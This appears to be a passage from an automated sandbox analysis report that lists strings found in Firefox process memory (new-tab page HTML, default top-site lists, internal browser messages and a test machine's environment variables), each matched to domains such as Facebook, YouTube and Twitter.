Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: --panel-banner-item-update-supported-bgcolor*://*.adsafeprotected.com/*/unit/*addons-search-detection@mozilla.com*://pubads.g.doubleclick.net/gampad/*ad-blk*resource://builtin-addons/search-detection/addons-search-detection%40mozilla.com:2.0.0https://en.wikipedia.org/wiki/Special:Search*https://ads.stickyadstv.com/firefox-etp*://vast.adsafeprotected.com/vast**://ads.stickyadstv.com/auto-user-sync*resource://search-extensions/google/*://www.facebook.com/platform/impression.php*resource://search-extensions/amazondotcom/*://*.adsafeprotected.com/services/pub**://pubads.g.doubleclick.net/gampad/*xml_vmap2*_closedTabsFromClosedWindowsEnabled equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001E.00000002.3030702011.00000270C98E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -os-restarted https://www.youtube.com/accountH equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3096588402.00000270E2065000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .S........[tlsflags0x00000000]www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 7www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3096588402.00000270E2065000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3105314081.00000270E4003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3069796496.00000270DB2B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3073075739.00000270DB85A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008157636.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2998160641.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3073075739.00000270DB85A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3103512040.00000270E3DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008157636.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3087332031.00000270DDB69000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3035541532.00000270D6C0D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2995008138.00000270DC21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2952270255.00000158A7AE3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2950780857.00000158A7ADE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 8p8https://www.youtube.com/account --attempting-deelevationUser equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3067558634.00000270DB05D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3060815323.00000270DADD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3100681543.00000270E234C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993750168.00000270E21F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3105314081.00000270E4003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8~predictor-origin,:https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3096588402.00000270E2065000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3105314081.00000270E4003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: :https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000003.2958769374.00000270CC685000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2957174991.00000270CC685000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3034852957.00000270D6947000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @mozilla.org/network/protocol;1?name=filedevtools.debugger.features.javascript-tracingJSON Viewer's onSave failed in startPersistenceFailed to listen. Callback argument missing.Unable to start devtools server on @mozilla.org/uriloader/handler-service;1DevToolsStartup.jsm:handleDebuggerFlag{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}browser.fixup.dns_first_for_single_words@mozilla.org/network/protocol;1?name=defaultbrowser.urlbar.dnsResolveFullyQualifiedNamesdevtools.debugger.remote-websocketWebChannel/this._originCheckCallbackdevtools-commandkey-javascript-tracing-togglereleaseDistinctSystemPrincipalLoader@mozilla.org/dom/slow-script-debug;1devtools/client/framework/devtoolsdevtools-commandkey-profiler-start-stopresource://devtools/shared/security/socket.jsFailed to listen. Listener already attached.Failed to execute WebChannel callback:and deploy previews URLs are allowed.devtools-commandkey-profiler-capturedevtools/client/framework/devtools-browserbrowser and that URL. Falling back to devtools.performance.recording.ui-base-urlresource://devtools/server/devtools-server.jsDevTools telemetry entry point failed: Got invalid request to save JSON dataNo callback set for this channel.^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$devtools.performance.popup.feature-flagbrowser.fixup.domainsuffixwhitelist.http://www.inbox.lv/rfc2368/?value=%s^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?get FIXUP_FLAGS_MAKE_ALTERNATE_URIisDownloadsImprovementsAlreadyMigratedhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://poczta.interia.pl/mh/?mailto=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/uriloader/web-handler-app;1resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/FileUtils.sys.mjsget FIXUP_FLAG_FORCE_ALTERNATE_URI^([a-z+.-]+:\/{0,3})*([^\/@]+@).+get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPScheme should be either http or https{c6cf88b7-452e-47eb-bdc9-86e3561648ef}{33d75835-722f-42c0-89cc-44f328e56a86}extractScheme/fixupChangedProtocol<gecko.handlerService.defaultHandlersVersionhttps://mail.yahoo.co.jp/compose/?To=%shttps://mail.inbox.lv/compose?to=%sCan't invoke URIFixup in the content processhandlerSvc fillHandlerInfo: don't know this type@mozilla.org/uriloader/dbus-handler-app;1@mozilla.org/uriloader/local-handler-app;1resource://gre/modules/JSONFile.sys.mjs^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)https://e.mail.ru/cgi-bin/sentmsg?mailto=%s_injectDefaultProtocolHandlersIfNeededresource://gre/modules/FileUtils.sys.mjshttp://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/NetUtil.sys.mjs_finalizeInternal/this._finalizePromise<resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/JSONFile.sys.mjs@mozilla.org/network/file-input-stream;1resource://gre/modules/ExtHandlerService.sys.mjs@mozilla.org/network/async-stream-copier;1Must have a source and a callbacknewChannel requires a single object argumentNon-zero amount of bytes must be specified@mozilla.org/network/simple-stream-listener;1@mozilla.org/intl/converter-input-stream;1SEC_ALLOW
Source: firefox.exe, 0000001E.00000002.3034852957.00000270D6947000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsp equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2952270255.00000158A7AC7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3030803173.00000270C9930000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2958630660.0000014A6E160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account--attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2958630660.0000014A6E160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3030803173.00000270C9930000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2952270255.00000158A7AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exewinsta0\default equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3031858393.00000270CC65D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3031858393.00000270CC5D0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2957174991.00000270CC674000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3034852957.00000270D6947000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsMALLOC_OPTIONS=rII equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Must provide a boolean argument_updateFlexData/flexDataArray<isSafeToPlayDeferredEventDOM_VK_WIN_OEM_FJ_MASSHOUDOM_VK_WIN_OEM_FJ_TOUROKUmaxHistoricalSearchSuggestionsfirefox-suggest-weather-titlesuggestedIndexResultsByGroupunitConversion.suggestedIndexcanIncrementMinKeywordLengthstrippedUrlToTopPrefixAndTitleDOM_KEY_LOCATION_STANDARDfirefox-suggest-urlbar-blockfractionalDataArray is empty!experimental.hideHeuristic)?(?:\s+in\s+|\s+to\s+|\s*=\s*)(WEATHER_PROVIDER_DISPLAY_NAMEincrementMinKeywordLengthisURLEquivalentToResultURL_checkAndSetExposureProperties)(?:\s+in\s+|\s+to\s+|\s*=\s*)(TOP_SITES_MAX_SITES_PER_ROW_addSuggestedIndexResultseNewlinesReplaceWithSpacesensureUnloadHandlerRegistered/<_createShowMoreSyncedTabsElementrecordSyncedTabsTelemetryhttps://www.youtube.com/accountMIN_STATUS_ANIMATION_DURATION_createNoSyncedTabsElement equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3106563989.00000270E4116000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2999210432.00000270E4118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: PARSE_ERROR_TOO_MANY_ELEMENTS@mozilla.org/referrer-info;1Couldn't create URI from Error accessing host name: READER_MODE_DOWNLOAD_RESULT@mozilla.org/parserutils;1permission-popup-menulisthttps://www.youtube.com/account_adoptBrowserFromOtherWindow equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: PREF_ISDEFAULT_CACHE_STATEinitializeDefaultPreferencesgetProtocolHandlerInfoFromOS with insecure template URL checkHost/isIPv4Address/<nsIExternalProtocolService_migrateProtocolHandlersIfNeeded with invalid template URL browser.handlers.migrationsbrowser-open-homepage-startVALIDATE_NO_DEFAULT_FILENAMEPREF_BRANCH_WAS_REGISTEREDvalidateFileNameForSavingasyncEmitManifestEntry("author")VALIDATE_FORCE_APPEND_EXTENSION-*- UpdateBrowserIDHelper: toolkit.singletonWindowTypepreviousHandler.preferredAction.https://www.youtube.com/account_shouldViewDownloadInternallygetCombined/overrideFnArray<getMostRecentBrowserWindow@mozilla.org/browser/clh;1toolkit.defaultChromeFeatures^[a-z0-9][a-z0-9-]+[a-z0-9]$ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3034852957.00000270D6939000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: RT_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\P equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyUpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: src=image,triggeringprincipal=iconloadingprincipal,requestcontextid,fadein,pinned,selected=visuallyselected,busy,crashed,sharing,pictureinpicturehttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyUpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: src=image,triggeringprincipal=iconloadingprincipal,requestcontextid,fadein,pinned,selected=visuallyselected,busy,crashed,sharing,pictureinpicturehttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyUpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: src=image,triggeringprincipal=iconloadingprincipal,requestcontextid,fadein,pinned,selected=visuallyselected,busy,crashed,sharing,pictureinpicturehttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single 